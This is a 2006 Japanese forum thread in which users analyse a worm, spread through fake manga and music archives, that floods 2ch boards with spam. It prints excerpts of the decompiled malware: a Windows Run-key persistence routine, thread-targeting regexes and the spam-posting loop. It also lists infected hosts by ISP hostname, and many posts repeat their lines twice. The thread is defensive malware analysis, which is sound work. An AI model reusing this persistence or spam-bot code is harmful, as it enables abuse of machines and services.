ここはウィルス等を利用した爆撃等の相談所です。
ウィルス感染ホストの報告と焼き処を兼ねます。
#削除依頼は、削除整理板へお願いします。
#ここでは芋掘りは行いません。専用スレでどうぞ。
【関連スレ】
【BBQ&BBM12本目】公開串登録所【ピンポイント規制】
http://qb5.2ch.net/test/read.cgi/sec2chd/1139102655/
bbs.cgi再開発プロジェクト7
http://qb5.2ch.net/test/read.cgi/operate/1130918407/
■ウィルス爆撃相談所&焼き処【RockBBQ】
レス数が950を超えています。1000を超えると書き込みができなくなります。
2006/02/25(土) 23:49:54ID:???0
867名無しの報告
2006/03/30(木) 15:06:11ID:GZiWxEj90 投稿毎に番号入力を強制するようにはできないの?
多少面倒でも爆撃で埋められるよりはマシじゃん
多少面倒でも爆撃で埋められるよりはマシじゃん
868名無しの報告
2006/03/30(木) 15:08:12ID:1fFYlHSU0 今日は・・・
ID:UHc3otES0 205 res
2006/03/30 00:00:17 【album】【hiphop】 Nujabes - Metaphorical music.zip,,0,0,a12a1d14297d6b068c294782d07bbf28,1
2006/03/30 00:02:53 【HIPHOP】【シングル】【洋楽】HipHop Mix - Shyne Cam`Ron Eminem Aaliyah Timbaland Big Pun 504 Boys Bone Thugs Lil` Zane 112 Mya D-12 Jay -z 2 PAC NAS.mp3.mp3.mp3.mp3,,0,0,df1cf121662440442e4e89907377c3ac,1
2006/03/30 00:08:46 【HIPHOP】【シングル】【洋楽】Eminem with DMX Xzibit Ja Rule & 2Pac - Bitch Please III.lzh,,0,0,38c1900d951207a64f1de458bd4ffb05,1
2006/03/30 00:12:05 【HIPHOP】【アルバム】【洋楽】2Pac - Until The End Of Time.zip,,0,0,3414d4540478661ec46f453fa485f541,1
2006/03/30 00:18:39 【HIPHOP】【シングル】【洋楽】REMIX---R&B.Hip-Hop Mix 2 - (Ja Rule Shaggy Destiny's Child Mya Next Ruff Endz Pink Jay-Z).mp3.lzh,,0,0,e11d113fa2a5d648d6544c12b2056608,1
ID:tCUSJrP30 472 res
2006/03/30 05:39:42 【HIPHOP】【シングル】【洋楽】HipHop Mix - Shyne Cam`Ron Eminem Aaliyah Timbaland Big Pun 504 Boys Bone Thugs Lil` Zane 112 Mya D-12 Jay -z 2 PAC NAS.mp3.mp3.mp3.mp3,,0,0,df1cf121662440442e4e89907377c3ac,1
2006/03/30 05:43:38 【HIPHOP】【アルバム】【洋楽】2Pac - Until The End Of Time.zip,,0,0,3414d4540478661ec46f453fa485f541,1
2006/03/30 05:44:17 【HIPHOP】【シングル】【洋楽】eminem redman snoop dogg pharoahe monch krayzie bone dmx eve b.g. jurrassic 5 2pac bizzy bone method man big punisher jadakiss krs-one - hip hop mix 1(1)(1)(4).mp3,,0,0,68c276011bc9c51b389261d37c97c03b,1
2006/03/30 05:50:06 【HIPHOP】【シングル】【洋楽】Eminem with DMX Xzibit Ja Rule & 2Pac - Bitch Please III.lzh,,0,0,38c1900d951207a64f1de458bd4ffb05,1
ID:UHc3otES0 205 res
2006/03/30 00:00:17 【album】【hiphop】 Nujabes - Metaphorical music.zip,,0,0,a12a1d14297d6b068c294782d07bbf28,1
2006/03/30 00:02:53 【HIPHOP】【シングル】【洋楽】HipHop Mix - Shyne Cam`Ron Eminem Aaliyah Timbaland Big Pun 504 Boys Bone Thugs Lil` Zane 112 Mya D-12 Jay -z 2 PAC NAS.mp3.mp3.mp3.mp3,,0,0,df1cf121662440442e4e89907377c3ac,1
2006/03/30 00:08:46 【HIPHOP】【シングル】【洋楽】Eminem with DMX Xzibit Ja Rule & 2Pac - Bitch Please III.lzh,,0,0,38c1900d951207a64f1de458bd4ffb05,1
2006/03/30 00:12:05 【HIPHOP】【アルバム】【洋楽】2Pac - Until The End Of Time.zip,,0,0,3414d4540478661ec46f453fa485f541,1
2006/03/30 00:18:39 【HIPHOP】【シングル】【洋楽】REMIX---R&B.Hip-Hop Mix 2 - (Ja Rule Shaggy Destiny's Child Mya Next Ruff Endz Pink Jay-Z).mp3.lzh,,0,0,e11d113fa2a5d648d6544c12b2056608,1
ID:tCUSJrP30 472 res
2006/03/30 05:39:42 【HIPHOP】【シングル】【洋楽】HipHop Mix - Shyne Cam`Ron Eminem Aaliyah Timbaland Big Pun 504 Boys Bone Thugs Lil` Zane 112 Mya D-12 Jay -z 2 PAC NAS.mp3.mp3.mp3.mp3,,0,0,df1cf121662440442e4e89907377c3ac,1
2006/03/30 05:43:38 【HIPHOP】【アルバム】【洋楽】2Pac - Until The End Of Time.zip,,0,0,3414d4540478661ec46f453fa485f541,1
2006/03/30 05:44:17 【HIPHOP】【シングル】【洋楽】eminem redman snoop dogg pharoahe monch krayzie bone dmx eve b.g. jurrassic 5 2pac bizzy bone method man big punisher jadakiss krs-one - hip hop mix 1(1)(1)(4).mp3,,0,0,68c276011bc9c51b389261d37c97c03b,1
2006/03/30 05:50:06 【HIPHOP】【シングル】【洋楽】Eminem with DMX Xzibit Ja Rule & 2Pac - Bitch Please III.lzh,,0,0,38c1900d951207a64f1de458bd4ffb05,1
869名無しの報告
2006/03/30(木) 15:09:54ID:Nfp4/dY10870c⌒っミ `Д)っφ ◆CaKkuEV3EI
NGNG871名無しの報告
2006/03/30(木) 15:31:52ID:1fFYlHSU0 対策方法
・Rock + バーボン
・特定のIDを狙いうち
・Rock + バーボン
・特定のIDを狙いうち
872名無しの報告
2006/03/30(木) 15:33:14ID:GZiWxEj90873c⌒っミ `Д)っφ ◆CaKkuEV3EI
NGNG874水色@飛行石 ★
2006/03/30(木) 15:42:30ID:???0875名無しの報告
2006/03/30(木) 15:45:00ID:d3zttCMS0 【結局】着回しを真剣に考えるスレ【金無いんだよ】
http://comic6.2ch.net/test/read.cgi/doujin/1036395101/l50
ここのスレ、k9Tzvsz7が昨日の深夜、WRuVwZkFが朝から一人で攻撃していますね。
同一人物だとすると、他の攻撃スレには何人かいるので、何種類かの亜種がいる可能性大。
http://comic6.2ch.net/test/read.cgi/doujin/1036395101/l50
ここのスレ、k9Tzvsz7が昨日の深夜、WRuVwZkFが朝から一人で攻撃していますね。
同一人物だとすると、他の攻撃スレには何人かいるので、何種類かの亜種がいる可能性大。
876c⌒っミ `Д)っφ ◆CaKkuEV3EI
NGNG877名無しの報告
2006/03/30(木) 15:47:25ID:1fFYlHSU0878名無しの報告
2006/03/30(木) 15:56:18ID:d3zttCMS0 ついにプロバイダーが動く
http://tmp6.2ch.net/test/read.cgi/download/1142594523/292-
hbs80006.hbs.ne.jpがしつこく書き込んでる。
症状が今回のウイルスなので、焼いてください。
http://tmp6.2ch.net/test/read.cgi/download/1142594523/292-
hbs80006.hbs.ne.jpがしつこく書き込んでる。
症状が今回のウイルスなので、焼いてください。
879名無しの報告
2006/03/30(木) 16:04:00ID:1fFYlHSU0 いきなり手に入った
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip TrahIRSX7w 5,921,635 aa79d0cf8c6fcd857b890ca6ac4498cc
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip PoITQxGbsQ 6,502,611 293941e450b10a74f4c3953789ed7077
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip k7t40jJlVq 6,830,256 859c1152ae891af6e45d39facb690d27
require 'zlib'
def self_destructive board
#爆撃終了
board.settings['BBS_TITLE'] == 'この板は腐ってる@2ch掲示板'
end
(省略)
load_exec 'AntiDojin.rb.zz'
あふぉかと・・・
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip TrahIRSX7w 5,921,635 aa79d0cf8c6fcd857b890ca6ac4498cc
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip PoITQxGbsQ 6,502,611 293941e450b10a74f4c3953789ed7077
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip k7t40jJlVq 6,830,256 859c1152ae891af6e45d39facb690d27
require 'zlib'
def self_destructive board
#爆撃終了
board.settings['BBS_TITLE'] == 'この板は腐ってる@2ch掲示板'
end
(省略)
load_exec 'AntiDojin.rb.zz'
あふぉかと・・・
881名無しの報告
2006/03/30(木) 16:19:06ID:1fFYlHSU0 zlib使ったこと無いし
perlからzlibの使い方も知らぬ
(中にある)ファイルの日付は昨日(03/29)と今日(03/30 8:50)だった
少し追加
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip PoITQxGbsQ 6,502,611 293941e450b10a74f4c3953789ed7077
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip k7t40jJlVq 6,830,256 859c1152ae891af6e45d39facb690d27
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip TrahIRSX7w 5,921,635 aa79d0cf8c6fcd857b890ca6ac4498cc
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip kTrEVbYUbc 6,502,611 8a31ae38742cea2d46eb2bb054d3964c
(一般コミック・雑誌) [ジャンプ] [2006-18] テニスの王子様 Genius307.zip k7t40jJlVq 3,069,394 384fa751e8af899e950056e088899f05
以前にも見たような感じでファイルが・・・
perlからzlibの使い方も知らぬ
(中にある)ファイルの日付は昨日(03/29)と今日(03/30 8:50)だった
少し追加
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip PoITQxGbsQ 6,502,611 293941e450b10a74f4c3953789ed7077
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip k7t40jJlVq 6,830,256 859c1152ae891af6e45d39facb690d27
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip TrahIRSX7w 5,921,635 aa79d0cf8c6fcd857b890ca6ac4498cc
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip kTrEVbYUbc 6,502,611 8a31ae38742cea2d46eb2bb054d3964c
(一般コミック・雑誌) [ジャンプ] [2006-18] テニスの王子様 Genius307.zip k7t40jJlVq 3,069,394 384fa751e8af899e950056e088899f05
以前にも見たような感じでファイルが・・・
882水色@飛行石 ★
2006/03/30(木) 16:41:33ID:???0883名無しの報告
2006/03/30(木) 16:47:03ID:1fFYlHSU0 http://www.google.com/search?num=10&hl=ja&c2coff=1&q=bbs-menu-for-2ch+%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%E9%80%9F%E5%A0%B1&lr=lang_ja
で検索
<A HREF=http:\/\/([!-~]+)\.2ch\.net\/([!-~]+)\/>#{bbsname}<\/A>
にマッチしたやつを取得
['download.txt', 'tab1.txt', 'tab2.txt'].each{|x|
これは・・・
def startup filename
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key|
key.write_s('AntiDojin Extended by ', filename)
}
end
む。
↓続く
で検索
<A HREF=http:\/\/([!-~]+)\.2ch\.net\/([!-~]+)\/>#{bbsname}<\/A>
にマッチしたやつを取得
['download.txt', 'tab1.txt', 'tab2.txt'].each{|x|
これは・・・
def startup filename
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key|
key.write_s('AntiDojin Extended by ', filename)
}
end
む。
↓続く
884名無しの報告
2006/03/30(木) 16:51:01ID:yKCndGKs0 コミック系・mp3・ゲームやエロゲーのNoDVDパッチとかで
毎週亜種が増えていく予感
このウイルス作者はダウソ(同人も?)に恨みでもあるのかな?
爆撃のあった板に2get禁止のアレでウイルス対策ソフト使いましょうみたいな
宣伝したほうがいいんじゃないかな
それと2chのトップにウイルス対策ソフトを使えと書く (専ブラ使ってない人向けに)
ウイルス感染者が全員2ch見てる訳ではないと思うけど何もしないよりはいいかと
焼け石に水かもしれませんが・・・
毎週亜種が増えていく予感
このウイルス作者はダウソ(同人も?)に恨みでもあるのかな?
爆撃のあった板に2get禁止のアレでウイルス対策ソフト使いましょうみたいな
宣伝したほうがいいんじゃないかな
それと2chのトップにウイルス対策ソフトを使えと書く (専ブラ使ってない人向けに)
ウイルス感染者が全員2ch見てる訳ではないと思うけど何もしないよりはいいかと
焼け石に水かもしれませんが・・・
885名無しの報告
2006/03/30(木) 16:52:42ID:1fFYlHSU0 winny_thre = board.include_title(/と[^暴]{0,2}れ|ぱ.{0,2}く|ny|不正|盗|まね|真似/i)
share_thre = board.include_title(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/i)
rusu_thre = board.include_title(/ういるす|うぃるす/i)
$exename = 'c:\\:滝川クリトリスv3.exe'
$dataname = 'c:\\:滝川クリトリスv3.dat'
!!
if Time.now.to_i < 1143129600
爆撃の時間指定?
board = TwoChannel::Board.new('comic6', 'doujin')
SymantecAntiVirus 2006/03/27のやつで反応無しっと
share_thre = board.include_title(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/i)
rusu_thre = board.include_title(/ういるす|うぃるす/i)
$exename = 'c:\\:滝川クリトリスv3.exe'
$dataname = 'c:\\:滝川クリトリスv3.dat'
!!
if Time.now.to_i < 1143129600
爆撃の時間指定?
board = TwoChannel::Board.new('comic6', 'doujin')
SymantecAntiVirus 2006/03/27のやつで反応無しっと
886名無しの報告
2006/03/30(木) 16:56:23ID:1fFYlHSU0 ぺたぺた
use Compress::Zlib;
$ZoneProcessfile = "e2.bin"; #(該当部分を抜き出しておくこと)
($ZoneProcesssize) = (stat($ZoneProcessfile))[7];
open INFILE,$ZoneProcessfile;
binmode(INFILE);
read(INFILE,$ZoneProcessbindata,$ZoneProcesssize);
close INFILE;
$dest = uncompress($ZoneProcessbindata);
open OFILE,">ruby.rb";
print OFILE $dest;
close
何かの流用とか言うな
まとめ
昨日から同人板へ爆撃が始まったやつっぽい
use Compress::Zlib;
$ZoneProcessfile = "e2.bin"; #(該当部分を抜き出しておくこと)
($ZoneProcesssize) = (stat($ZoneProcessfile))[7];
open INFILE,$ZoneProcessfile;
binmode(INFILE);
read(INFILE,$ZoneProcessbindata,$ZoneProcesssize);
close INFILE;
$dest = uncompress($ZoneProcessbindata);
open OFILE,">ruby.rb";
print OFILE $dest;
close
何かの流用とか言うな
まとめ
昨日から同人板へ爆撃が始まったやつっぽい
887从*^▽^)るぅりん☆6歳@ギコナビ ◆IAc6UigumM
2006/03/30(木) 17:01:55ID:1fFYlHSU0888名無しの報告
2006/03/30(木) 17:02:23ID:d3zttCMS0 >>885
1143129600 = 2006/03/24(Fri) 01:00:00 JST
1143129600 = 2006/03/24(Fri) 01:00:00 JST
889水色@飛行石 ★
2006/03/30(木) 17:02:30ID:???0 >>884
その理屈で言うならですねー、ウイルスソフトは結構もう
普及してると思うんですー。
けど、パターンファイルに登録されない限り検出されないんですねー。
だから広がっちゃってるってのが事実だと思うんですー。
検出されるよーにするには、ウイルス本体を送って対応してもらう
必要があるわけですー。
パターンファイルの更新はー、早いところだと毎日やってますからー、
発見したら1日でも早く送るってのが次善の策だと思うんですー。
その理屈で言うならですねー、ウイルスソフトは結構もう
普及してると思うんですー。
けど、パターンファイルに登録されない限り検出されないんですねー。
だから広がっちゃってるってのが事実だと思うんですー。
検出されるよーにするには、ウイルス本体を送って対応してもらう
必要があるわけですー。
パターンファイルの更新はー、早いところだと毎日やってますからー、
発見したら1日でも早く送るってのが次善の策だと思うんですー。
890名無しの報告
2006/03/30(木) 17:21:26ID:1fFYlHSU0 ***** 31ruby.rb
772: end
773: share_thre = board.include_title(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼|/i)
774: if share_thre.empty?
***** 33RUBY.RB
772: end
773: share_thre = board.include_title(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/i)
774: if share_thre.empty?
*****
***** 33ruby.rb
852: begin
853: TwoChannel::set_user_agent
854: board = TwoChannel::Board.new('comic6', 'doujin')
***** 34RUBY.RB
852: begin
853: TwoChannel::set_user_agentdownloa
854: board = TwoChannel::Board.new('comic6', 'doujin')
*****
なんというか
バグ入りで(略
772: end
773: share_thre = board.include_title(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼|/i)
774: if share_thre.empty?
***** 33RUBY.RB
772: end
773: share_thre = board.include_title(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/i)
774: if share_thre.empty?
*****
***** 33ruby.rb
852: begin
853: TwoChannel::set_user_agent
854: board = TwoChannel::Board.new('comic6', 'doujin')
***** 34RUBY.RB
852: begin
853: TwoChannel::set_user_agentdownloa
854: board = TwoChannel::Board.new('comic6', 'doujin')
*****
なんというか
バグ入りで(略
891名無しの報告
2006/03/30(木) 17:27:28ID:d3zttCMS0892名無しの報告
2006/03/30(木) 17:33:40ID:d3zttCMS0 ビンゴっぽいね
【結局】着回しを真剣に考えるスレ【金無いんだよ】
http://comic6.2ch.net/test/read.cgi/doujin/1036395101/l50
↓
【兄者】さすがだよな俺ら・同人版【弟】
http://comic6.2ch.net/test/read.cgi/doujin/1036419858/l50
/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/
この正規表現がいまいち良く分からない。見た目と違ったマッチになるけど間違った記述なのかな?
【結局】着回しを真剣に考えるスレ【金無いんだよ】
http://comic6.2ch.net/test/read.cgi/doujin/1036395101/l50
↓
【兄者】さすがだよな俺ら・同人版【弟】
http://comic6.2ch.net/test/read.cgi/doujin/1036419858/l50
/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/
この正規表現がいまいち良く分からない。見た目と違ったマッチになるけど間違った記述なのかな?
893名無しの報告
2006/03/30(木) 17:46:12ID:d3zttCMS0 ・・・・上で貼られたウイルスの感染者はID:WRuVwZkFしかいない気がする。
【兄者】さすがだよな俺ら・同人版【弟】
http://comic6.2ch.net/test/read.cgi/doujin/1036419858/l50
【ステル鞠ア】朝倉/芹野パクリ検証スレ【パクラ小麦】
http://comic6.2ch.net/test/read.cgi/doujin/1108821254/l50
ここにもID:WRuVwZkFがいるが、複数感染してる可能性がある。
【兄者】さすがだよな俺ら・同人版【弟】
http://comic6.2ch.net/test/read.cgi/doujin/1036419858/l50
【ステル鞠ア】朝倉/芹野パクリ検証スレ【パクラ小麦】
http://comic6.2ch.net/test/read.cgi/doujin/1108821254/l50
ここにもID:WRuVwZkFがいるが、複数感染してる可能性がある。
894RockRanger ★
2006/03/30(木) 17:51:09ID:???P >>831の続きですー(comic6も追加)
3/29 12:58:11〜3/30 17:27:15(tmp6)
〜3/30 17:28:07(comic6)
-tmp6-
221-186-221-200.ip1.george24.com 213件
p36003-adsao12honb4-acca.tokyo.ocn.ne.jp 105件
p51044-adsao12honb4-acca.tokyo.ocn.ne.jp 78件
phoenix.aitai.ne.jp 21件
softbank219062040169.bbtec.net 12件
softbank219052178096.bbtec.net 11件
dhcp-ubr1-0427.csf.ne.jp 11件
cable153064.ont.ne.jp 6件
nissin45079.ccnw.ne.jp 5件
N029029.ppp.dion.ne.jp 3件
135.169.hinocatv.ne.jp 2件
-comic6-
blackcat.reslife.okstate.edu 20件
p927305.aicint01.ap.so-net.ne.jp 15件
nissin45079.ccnw.ne.jp 3件
3/29 12:58:11〜3/30 17:27:15(tmp6)
〜3/30 17:28:07(comic6)
-tmp6-
221-186-221-200.ip1.george24.com 213件
p36003-adsao12honb4-acca.tokyo.ocn.ne.jp 105件
p51044-adsao12honb4-acca.tokyo.ocn.ne.jp 78件
phoenix.aitai.ne.jp 21件
softbank219062040169.bbtec.net 12件
softbank219052178096.bbtec.net 11件
dhcp-ubr1-0427.csf.ne.jp 11件
cable153064.ont.ne.jp 6件
nissin45079.ccnw.ne.jp 5件
N029029.ppp.dion.ne.jp 3件
135.169.hinocatv.ne.jp 2件
-comic6-
blackcat.reslife.okstate.edu 20件
p927305.aicint01.ap.so-net.ne.jp 15件
nissin45079.ccnw.ne.jp 3件
895名無しの報告
2006/03/30(木) 17:56:34ID:3SBpntzK0896水色@飛行石 ★
2006/03/30(木) 18:17:58ID:???0 >>895
どーゆースレタイのスレを立てればいーか整理してー、
理由も添えて、ここに申し込んでみてくださいー。
【実験】書き込めなスレッド スレッド924について2
http://qb5.2ch.net/test/read.cgi/operate/1075184383/
どーゆースレタイのスレを立てればいーか整理してー、
理由も添えて、ここに申し込んでみてくださいー。
【実験】書き込めなスレッド スレッド924について2
http://qb5.2ch.net/test/read.cgi/operate/1075184383/
897从*^▽^)るぅりん☆6歳@ギコナビ ◆IAc6UigumM
2006/03/30(木) 18:25:26ID:1fFYlHSU0898名無しの報告
2006/03/30(木) 19:20:41ID:1fFYlHSU0 def main_write board, messe #ぎりぎりか?
nanasi_name = board.settings['BBS_NONAME_NAME'] == '' ? '[名無し]さん(bin+cue).rar' : board.settings['BBS_NONAME_NAME']
name_max = board.settings['BBS_NAME_COUNT'].to_i
nanasi_name = nanasi_name[0, name_max]
targets = []
winny_thre = board.include_title(/と[^暴]{0,2}れ|ぱ.{0,2}く|ny|不正|盗|まね|真似/i)
if winny_thre.empty?
targets << board.max_res
else
targets << winny_thre.min{|a, b| a.key - b.key}
end
share_thre = board.include_title(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/i)
if share_thre.empty?
targets << board.oldest
else
targets << share_thre.min{|a, b| a.key - b.key}
end
rusu_thre = board.include_title(/ういるす|うぃるす/i)
if rusu_thre.empty?
#targets << board.first
else
targets << share_thre.min{|a, b| a.key - b.key}
end
targets.unshift(*(board.sort_old[-2, 2]))
targets.each{|x|
unless x.write(nanasi_name, '', messe.rnd)
x.board.tmp_wait
end
}
end
nanasi_name = board.settings['BBS_NONAME_NAME'] == '' ? '[名無し]さん(bin+cue).rar' : board.settings['BBS_NONAME_NAME']
name_max = board.settings['BBS_NAME_COUNT'].to_i
nanasi_name = nanasi_name[0, name_max]
targets = []
winny_thre = board.include_title(/と[^暴]{0,2}れ|ぱ.{0,2}く|ny|不正|盗|まね|真似/i)
if winny_thre.empty?
targets << board.max_res
else
targets << winny_thre.min{|a, b| a.key - b.key}
end
share_thre = board.include_title(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/i)
if share_thre.empty?
targets << board.oldest
else
targets << share_thre.min{|a, b| a.key - b.key}
end
rusu_thre = board.include_title(/ういるす|うぃるす/i)
if rusu_thre.empty?
#targets << board.first
else
targets << share_thre.min{|a, b| a.key - b.key}
end
targets.unshift(*(board.sort_old[-2, 2]))
targets.each{|x|
unless x.write(nanasi_name, '', messe.rnd)
x.board.tmp_wait
end
}
end
900野焼き ★
2006/03/30(木) 20:04:46ID:???0901名無しの報告
2006/03/30(木) 20:25:44ID:d3zttCMS0 >>898
定義の部分がないから妄想で
winny_threに(/と[^暴]{0,2}れ|ぱ.{0,2}く|ny|不正|盗|まね|真似/i)とマッチするスレを入れる。
もし、winny_threが空っぽなら
条件を満たすものの中からmax_res(dat番号が一番大きい場所?)を狙う
否なら
キーワードを満たす一番古いスレを狙う
share_threに(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/i)とマッチするスレを入れる。
もし、share_threが空っぽなら
一番古いスレを狙う
否なら
キーワードを満たす一番古いスレを狙う
rusu_threに(/ういるす|うぃるす/i)とマッチするスレを入れる
もし、rusu_threが空ならば
コメントアウトしてるのでなし
否ならば
条件を満たすものの中で最古のものを狙う
-----
ただ、マッチングにバグがあるみたいだからほぼ無差別に最新2スレを狙ってるみたい。
定義の部分がないから妄想で
winny_threに(/と[^暴]{0,2}れ|ぱ.{0,2}く|ny|不正|盗|まね|真似/i)とマッチするスレを入れる。
もし、winny_threが空っぽなら
条件を満たすものの中からmax_res(dat番号が一番大きい場所?)を狙う
否なら
キーワードを満たす一番古いスレを狙う
share_threに(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/i)とマッチするスレを入れる。
もし、share_threが空っぽなら
一番古いスレを狙う
否なら
キーワードを満たす一番古いスレを狙う
rusu_threに(/ういるす|うぃるす/i)とマッチするスレを入れる
もし、rusu_threが空ならば
コメントアウトしてるのでなし
否ならば
条件を満たすものの中で最古のものを狙う
-----
ただ、マッチングにバグがあるみたいだからほぼ無差別に最新2スレを狙ってるみたい。
902名無しの報告
2006/03/30(木) 20:41:04ID:d3zttCMS0903名無しの報告
2006/03/30(木) 20:42:59ID:yZD8gakK0 >>885
> $exename = 'c:\\:滝川クリトリスv3.exe'
> $dataname = 'c:\\:滝川クリトリスv3.dat'
このv3ってなに?
アンラボのV3 ウイルスブロック v3antinny.exeに対抗してるの?
アンラボの販促とか?
> $exename = 'c:\\:滝川クリトリスv3.exe'
> $dataname = 'c:\\:滝川クリトリスv3.dat'
このv3ってなに?
アンラボのV3 ウイルスブロック v3antinny.exeに対抗してるの?
アンラボの販促とか?
905名無しの報告
2006/03/30(木) 22:09:30ID:d3zttCMS0 >>904
ウイルスがここにだけfusianaするようです。参考になれば
ついにプロバイダーが動く
http://tmp6.2ch.net/test/read.cgi/download/1142594523/l50
ウイルスがここにだけfusianaするようです。参考になれば
ついにプロバイダーが動く
http://tmp6.2ch.net/test/read.cgi/download/1142594523/l50
906reffi@報告人 ★
2006/03/30(木) 22:12:26ID:???0 >905
フシアナ+アドレス帳の内容ばらまき型ウィルスはそこをターゲットにしてるよう
ですね
このタイプはまた違った種類なのかなぁ?
フシアナ+アドレス帳の内容ばらまき型ウィルスはそこをターゲットにしてるよう
ですね
このタイプはまた違った種類なのかなぁ?
907名無しの報告
2006/03/30(木) 22:25:03ID:d3zttCMS0 http://www.symantec.co.jp/region/jp/avcenter/venc/data/jp-trojan.kakkeys.d.html
の亜種と思われるので、同一のウイルスの動作だと思います。
IDで他の爆撃スレを検索するとヒットするので使えるかと。
とりあえず、松元さん本人か家族のアドレスに警告メールを送信しておきました。
の亜種と思われるので、同一のウイルスの動作だと思います。
IDで他の爆撃スレを検索するとヒットするので使えるかと。
とりあえず、松元さん本人か家族のアドレスに警告メールを送信しておきました。
908名無しの報告
2006/03/30(木) 22:32:05ID:youGa+bZ0909名無しの報告
2006/03/30(木) 22:43:38ID:DT2OEyfZ0 >>887
フリーのAVソフトウェア
AVG PSW.Generic.AGB(対応済み)
BitDefender に提出
ewido に提出
virustotalではKasperskyは対応済みだった。 nod32,avast4は未対応。
フリーのAVソフトウェア
AVG PSW.Generic.AGB(対応済み)
BitDefender に提出
ewido に提出
virustotalではKasperskyは対応済みだった。 nod32,avast4は未対応。
910c⌒っミ `Д)っφ ◆CaKkuEV3EI
NGNG シマンテック・キングソフト・マカフィー・avast!・某の人に送りました。
912名無しの報告
2006/03/31(金) 00:09:37ID:1XRB8KMZ0 乙
914RockRanger ★
2006/03/31(金) 14:07:23ID:???P >>894の続きですー
3/30 17:27:15〜3/31 13:39:22(tmp6)
〜3/31 11:08:46(comic6)
-tmp6-
p8082-adsau12honb4-acca.tokyo.ocn.ne.jp 199件
phoenix.aitai.ne.jp 121件
144.114.168.203.megaegg.ne.jp 89件
p8081-ipad407marunouchi.tokyo.ocn.ne.jp 52件
p51044-adsao12honb4-acca.tokyo.ocn.ne.jp 36件
p7231-adsau12honb4-acca.tokyo.ocn.ne.jp 14件
p8126-ipad63marunouchi.tokyo.ocn.ne.jp 39件
softbank219052178096.bbtec.net 11件
p4169-ipbf05okidate.aomori.ocn.ne.jp 7件
i238241.ppp.asahi-net.or.jp 6件
softbank219062040169.bbtec.net 5件
210-194-24-189.rev.home.ne.jp 5件
nissin45079.ccnw.ne.jp 5件
-comic6-
d-218-40-130-174.d-cable.katch.ne.jp 103件
blackcat.reslife.okstate.edu 30件
p927305.aicint01.ap.so-net.ne.jp 14件
*一部共有ホストも含まれておりますー
3/30 17:27:15〜3/31 13:39:22(tmp6)
〜3/31 11:08:46(comic6)
-tmp6-
p8082-adsau12honb4-acca.tokyo.ocn.ne.jp 199件
phoenix.aitai.ne.jp 121件
144.114.168.203.megaegg.ne.jp 89件
p8081-ipad407marunouchi.tokyo.ocn.ne.jp 52件
p51044-adsao12honb4-acca.tokyo.ocn.ne.jp 36件
p7231-adsau12honb4-acca.tokyo.ocn.ne.jp 14件
p8126-ipad63marunouchi.tokyo.ocn.ne.jp 39件
softbank219052178096.bbtec.net 11件
p4169-ipbf05okidate.aomori.ocn.ne.jp 7件
i238241.ppp.asahi-net.or.jp 6件
softbank219062040169.bbtec.net 5件
210-194-24-189.rev.home.ne.jp 5件
nissin45079.ccnw.ne.jp 5件
-comic6-
d-218-40-130-174.d-cable.katch.ne.jp 103件
blackcat.reslife.okstate.edu 30件
p927305.aicint01.ap.so-net.ne.jp 14件
*一部共有ホストも含まれておりますー
915星方天使天環 ◆W/UhU0N3pg
2006/03/31(金) 14:41:25ID:bY2+BZ0i0 ipbf05okidate.aomori.ocn.ne.jp
近所でかかった馬鹿がいるのか
なむなむ
共有
phoenix.aitai.ne.jp 121件
近所でかかった馬鹿がいるのか
なむなむ
共有
phoenix.aitai.ne.jp 121件
918RockRanger ★
2006/03/31(金) 18:35:34ID:???P921RockRanger ★
2006/03/31(金) 18:52:24ID:???P922名無しの報告
2006/03/31(金) 19:40:37ID:CkKagM1k0 >>908っす
symantecからレスポンスありました。
---
filename: (一般コミック・雑誌)[ジャンプ][2006-18]BLEACH221.zip
machine: Machine
result: See the developer notes
filename: BLEACH221.scr
machine: Machine
result: This file is detected as Trojan.Kakkeys.D. http://www.symantec.com/avcenter/venc/data/trojan.kakkeys.d.html
